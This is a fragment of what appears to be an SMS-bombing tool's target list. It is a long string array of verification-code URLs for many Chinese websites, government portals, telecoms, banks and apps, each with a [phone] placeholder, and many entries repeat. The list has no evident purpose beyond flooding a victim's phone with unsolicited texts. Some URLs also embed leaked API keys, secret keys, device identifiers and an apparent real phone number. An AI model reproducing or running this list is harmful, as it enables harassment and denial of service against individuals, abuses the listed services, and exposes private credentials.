"https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://webapp.qianbao188.aloestec.com/v2/app/pub/channel/smsCode?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://wx.fowep.com/iwater/v1/usercenter/nt/sendAuthCode/v2.json?requestPara=%7B%22mobile%22:%22[phone]%22,%22type%22:1,%22token%22:null,%22waterCorpId%22:3,%22UNID%22:%22%22,%22areaId%22:0,%22accountType%22:%22XJ%22,%22apiType%22:%22PC%22,%22appVersion%22:%221.0.2%22%7D", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://dappweb.huolala.cn/index.php?_su=1609554659540820860&revision=&_m=register&_a=send_register_sms_code&phone_no=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "http://app.zangcun.com/registerCode?mobile=[phone]", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8,1&device_name=iPhone 6s&languageCode=zh&latitude=29.587192&localeIdentifier", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", + "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.zangcun.com/registerCode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "https://www.xd.com/users/sendRegisterCode?callback=jQuery110201470901275837977_1591599902822&mobile=[phone]&area_code=86&_=1591599902823", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", + "http://1314.buzz:80/index.php?hm=[phone]&ok=", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%3D", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=您的手机验证码为:3973+,该验证码10%", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "http://hk-dns.sskweb.cn/api.php?act=user&key=XsWxsZDyh58V9whXWR&phone=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + 